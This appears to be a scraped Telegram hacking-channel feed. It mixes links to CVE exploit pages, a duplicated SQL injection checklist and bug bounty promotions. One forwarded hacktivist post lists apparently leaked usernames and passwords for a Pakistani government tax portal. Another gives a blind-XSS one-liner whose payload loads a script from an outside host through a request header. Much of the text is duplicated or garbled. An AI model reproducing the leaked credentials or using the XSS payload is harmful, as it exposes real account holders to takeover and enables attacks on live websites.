https://system32.ink/microsoft-outlook-rce-cve-2024-21378-exploit/
Microsoft Outlook RCE CVE-2024-21378 Exploit
https://system32.ink/pan-os-firewall-cve-2024-3400-exploit-script/
PAN-OS Firewall CVE-2024-3400 Exploit Script
https://system32.in/topic/online-tools-to-identify-a-location-from-an-uploaded-photo-using-ai/
Online Tools To Identify A Location From An Uploaded Photo Using AI
Forwarded from Jeetendra Joshi
## Test For SQL Injection
[ ] Test SQL Injection on authentication forms
[ ] Test SQL Injection on the search bar
[ ] Test SQL Injection on editable characteristics
[ ] Try to find SQL keywords or entry point detections
[ ] Try to inject SQL queries
[ ] Use tools like SQLmap or Hackbar
[ ] Use Google dorks to find the SQL keywords
[ ] Try GET based SQL Injection
[ ] Try POST based SQL Injection
[ ] Try COOKIE based SQL Injection
[ ] Try HEADER based SQL Injection
[ ] Try SQL Injection with null bytes before the SQL query
[ ] Try SQL Injection with URL encoding
[ ] Try SQL Injection with both lower and upper cases
[ ] Try SQL Injection with SQL Tamper scripts
[ ] Try SQL Injection with SQL Time delay payloads
[ ] Try SQL Injection with SQL Conditional delays
[ ] Try SQL Injection with Boolean based SQL
[ ] Try SQL Injection with Time based SQL
Follow on Twitter(X) : twitter.com/SH3lLH4CK3R
Join Telegram : t.me/Sh3llh4ck3r_Seโฆ
Subscribe YouTube : youtube.com/@newbiehackers
Follow on Instagram : instagram.com/sh3llh4ck3r
#bugbounty #ethicalhacking #hackforgood #infosec #cybersec #cybersecurity #informationsecurity
#smartcontract #blockchain #hacking #Web3Community #web3security #bugbounty #bugbountytips #sqlinjection
#Ethereum #howtohack #hackerone #immunefy #opensource #bugcrowd #solidity #programming
[ ] Test SQL Injection on authentication forms
[ ] Test SQL Injection on the search bar
[ ] Test SQL Injection on editable characteristics
[ ] Try to find SQL keywords or entry point detections
[ ] Try to inject SQL queries
[ ] Use tools like SQLmap or Hackbar
[ ] Use Google dorks to find the SQL keywords
[ ] Try GET based SQL Injection
[ ] Try POST based SQL Injection
[ ] Try COOKIE based SQL Injection
[ ] Try HEADER based SQL Injection
[ ] Try SQL Injection with null bytes before the SQL query
[ ] Try SQL Injection with URL encoding
[ ] Try SQL Injection with both lower and upper cases
[ ] Try SQL Injection with SQL Tamper scripts
[ ] Try SQL Injection with SQL Time delay payloads
[ ] Try SQL Injection with SQL Conditional delays
[ ] Try SQL Injection with Boolean based SQL
[ ] Try SQL Injection with Time based SQL
Follow on Twitter(X) : twitter.com/SH3lLH4CK3R
Join Telegram : t.me/Sh3llh4ck3r_Seโฆ
Subscribe YouTube : youtube.com/@newbiehackers
Follow on Instagram : instagram.com/sh3llh4ck3r
#bugbounty #ethicalhacking #hackforgood #infosec #cybersec #cybersecurity #informationsecurity
#smartcontract #blockchain #hacking #Web3Community #web3security #bugbounty #bugbountytips #sqlinjection
#Ethereum #howtohack #hackerone #immunefy #opensource #bugcrowd #solidity #programming
๐1
https://system32.in/topic/feat-factcheck-explorer-analysis-tool/
FEAT (Factcheck Explorer Analysis Tool)
Forwarded from Cybertix
๐ญ๐ฒ๐ฟ๐ผ-๐๐ฎ๐ ๐ฅ๐๐ ๐ฉ๐๐น๐ป๐ฒ๐ฟ๐ฎ๐ฏ๐ถ๐น๐ถ๐๐๐ฒ
๐ฃ๐ฟ๐ผ๐ฑ๐๐ฐ๐: Palo Alto Global Protect
๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฐ-๐ฏ๐ฐ๐ฌ๐ฌ
๐๐ถ๐ป๐ธ: https://youtube.com/shorts/H6Lskmn8ywU?si=CntyK-0hGQBWlgnU
๐ฃ๐ฟ๐ผ๐ฑ๐๐ฐ๐: Palo Alto Global Protect
๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฐ-๐ฏ๐ฐ๐ฌ๐ฌ
๐๐ถ๐ป๐ธ: https://youtube.com/shorts/H6Lskmn8ywU?si=CntyK-0hGQBWlgnU
YouTube
0-Day RCE Vulnerability in Palo Alto Global Protect
๐๐ช๐ค๐๐ฅ๐๐๐๐ ๐ฝ๐๐ค๐: https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalp...
https://system32.in/product/sheryians-codingschool-front-enddomination-createanything-with-code/
[ Sheryians CodingSchool ] Front-EndDomination: CreateAnything with Code
https://system32.ink/windows-kernel-elevation-of-privilege-cve-2024-21338-exploit/
Windows Kernel Elevation of Privilege CVE-2024-21338 Exploit
เคเคจเฅเคถเคเคธเฅเคฏเคฎเคจเฅเคเฅเคฐเฅเคถเค เคถเฅเคฐเฅเคคเค เคถเฅเคฒเค เคฆเคฎเค เคถเคฎเคเฅค
เคฐเคพเคเคตเค เคถเฅเคญเคฏเคจเฅเคคเฅเคฏเฅเคคเฅ เคทเคกเฅเคเฅเคฃเคพเค เคชเฅเคฐเฅเคทเฅเคคเฅเคคเคฎเคฎเฅเฅฅ
เคฐเคพเคฎ เคจเคตเคฎเฅ เคเฅ เคนเคพเคฐเฅเคฆเคฟเค เคถเฅเคญเคเคพเคฎเคจเคพเคฏเฅ โค๏ธ๐๐ป
เคเคฏ เคถเฅเคฐเฅ เคฐเคพเคฎ๐๐ป
เคฐเคพเคเคตเค เคถเฅเคญเคฏเคจเฅเคคเฅเคฏเฅเคคเฅ เคทเคกเฅเคเฅเคฃเคพเค เคชเฅเคฐเฅเคทเฅเคคเฅเคคเคฎเคฎเฅเฅฅ
เคฐเคพเคฎ เคจเคตเคฎเฅ เคเฅ เคนเคพเคฐเฅเคฆเคฟเค เคถเฅเคญเคเคพเคฎเคจเคพเคฏเฅ โค๏ธ๐๐ป
เคเคฏ เคถเฅเคฐเฅ เคฐเคพเคฎ๐๐ป
โคโ๐ฅ11๐2
https://system32.in/product/windows-process-injection-for-red-blue-teams/
Windows Process Injection for Red-Blue Teams BY PentesterAcademy
Forwarded from Cybertix
๐ข๐ฆ ๐๐ผ๐บ๐บ๐ฎ๐ป๐ฑ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ถ๐ป ๐๐ถ๐๐น๐ฎ๐ฏ๐ฑ
They have just ran a Gitlab Runner and passed out the OS Command which has executed Windows Calculator, in Windows OS Image.
๐ฝ๐ค๐ช๐ฃ๐ฉ๐ฎ : 6500$
๐๐ถ๐ป๐ธ: https://youtu.be/cDp-BTdhH0k?si=kLIoy_SKRL2T9MrS
They have just ran a Gitlab Runner and passed out the OS Command which has executed Windows Calculator, in Windows OS Image.
๐ฝ๐ค๐ช๐ฃ๐ฉ๐ฎ : 6500$
๐๐ถ๐ป๐ธ: https://youtu.be/cDp-BTdhH0k?si=kLIoy_SKRL2T9MrS
YouTube
GitLab Runner on Windows Host container OS Command Injection | Got Bounty of $6500 ๐ฑ #technology #ai
๐๐๐๐๐๐๐๐ค๐๐ ๐๐๐ฅ๐๐ง๐:
https://hackerone.com/reports/955016
๐๐ฑ๐ค๐๐ฃ ๐ค๐๐ง ๐ช๐ค๐๐ข๐๐ฃ๐๐ฉ๐ :
๐ด๐๐๐๐๐จ๐๐ฅ๐: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
๐ด๐๐๐ก๐๐๐๐๐
https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข : https://www.instagram.com/thecybertix/
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง:โฆ
https://hackerone.com/reports/955016
๐๐ฑ๐ค๐๐ฃ ๐ค๐๐ง ๐ช๐ค๐๐ข๐๐ฃ๐๐ฉ๐ :
๐ด๐๐๐๐๐จ๐๐ฅ๐: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
๐ด๐๐๐ก๐๐๐๐๐
https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข : https://www.instagram.com/thecybertix/
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง:โฆ
๐ฟ2
https://system32.ink/issabel-pbx-4.0.0-rce-authenticated-cve-2024-0986-exploit/
Issabel PBX 4.0.0 RCE โ Authenticated (CVE-2024-0986) Exploit
Forwarded from OSINT AMBITION (Dheeraj Yadav)
The Wednesday Updates #3(2024) is out now.
https://osintambition.substack.com/p/the-wednesday-updates-658
Don't forget to subscribe.
#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate #infosec
https://osintambition.substack.com/p/the-wednesday-updates-658
Don't forget to subscribe.
#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate #infosec
Osintupdates
The Wednesday Updates #3(2024)
A hub for all weekly updates from OSINT community at single place.
๐2
https://system32.in/product/become-a-soc-analyst-level-2-cybrary/
Become a SOC Analyst - Level 2 [Cybrary]
Forwarded from K I N G S M A N ๐ฎ๐ณ (๐ผ๐๐๐ฃ๐ฉ ๐ผ๐จ๐๐ค๐ฉ)
๐ฐPakistan ๐ต๐ฐ Federal Board of Revenue Credential Leaked By K I N G S M A N ๐ฎ๐ณ ๐ฐ
Threat Actor : K I N G S M A N ๐ฎ๐ณ
Type : Government
SPL MSG :Focus on Economics of your country and do not support Terrorism ๐
https://iris.fbr.gov.pk 4420689545809:Hamza@59
https://iris.fbr.gov.pk 3530164934712:d73yzpr5oh
https://iris.fbr.gov.pk 3110575024055:Iru#123*
https://iris.fbr.gov.pk 3520296235408:4263BEC2
https://iris.fbr.gov.pk 3530108287975:4upinbpx3x
JAI HIND ๐ฎ๐ณ
JAI SHREE RAM ๐ฉ
@KINGSMAN_INDIA
Threat Actor : K I N G S M A N ๐ฎ๐ณ
Type : Government
SPL MSG :
https://iris.fbr.gov.pk 4420689545809:Hamza@59
https://iris.fbr.gov.pk 3530164934712:d73yzpr5oh
https://iris.fbr.gov.pk 3110575024055:Iru#123*
https://iris.fbr.gov.pk 3520296235408:4263BEC2
https://iris.fbr.gov.pk 3530108287975:4upinbpx3x
#All_Indian_Hackers
#KINGSMAN
JAI HIND ๐ฎ๐ณ
JAI SHREE RAM ๐ฉ
@KINGSMAN_INDIA
โค4๐3๐1
Forwarded from Cybertix
๐๐น๐ถ๐ป๐ฑ ๐ซ๐ฆ๐ฆ ๐ถ๐ป ๐ซ-๐๐ผ๐ฟ๐๐ฎ๐ฟ๐ฑ๐ฒ๐ฑ-๐๐ผ๐๐ ๐๐ฒ๐ฎ๐ฑ๐ฒ๐ฟ
๐ข๐ป๐ฒ๐น๐ถ๐ป๐ฒ๐ฟ ๐๐ถ๐ป๐ธ๐๐ป
https://twitter.com/thecybertix/status/1781206342952464543?t=U6j7zOdxTrqQPrHJyzOpUg&s=19
๐ข๐ป๐ฒ๐น๐ถ๐ป๐ฒ๐ฟ ๐๐ถ๐ป๐ธ๐๐ป
https://twitter.com/thecybertix/status/1781206342952464543?t=U6j7zOdxTrqQPrHJyzOpUg&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
๐๐น๐ถ๐ป๐ฑ ๐ซ๐ฆ๐ฆ ๐ถ๐ป ๐ซ-๐๐ผ๐ฟ๐๐ฎ๐ฟ๐ฑ๐ฒ๐ฑ-๐๐ผ๐๐ ๐๐ฒ๐ฎ๐ฑ๐ฒ๐ฟ
findomain -t https://t.co/4XrLvdFCfL | gau | bxss -payload '"><script src=https://t.co/XNpH7dI1eE></script>' -header "X-Forwarded-For"
Access Oneliners from Github:
https://t.co/Lv5AeEDSFl
#bugbountytips #hacks
findomain -t https://t.co/4XrLvdFCfL | gau | bxss -payload '"><script src=https://t.co/XNpH7dI1eE></script>' -header "X-Forwarded-For"
Access Oneliners from Github:
https://t.co/Lv5AeEDSFl
#bugbountytips #hacks
โค1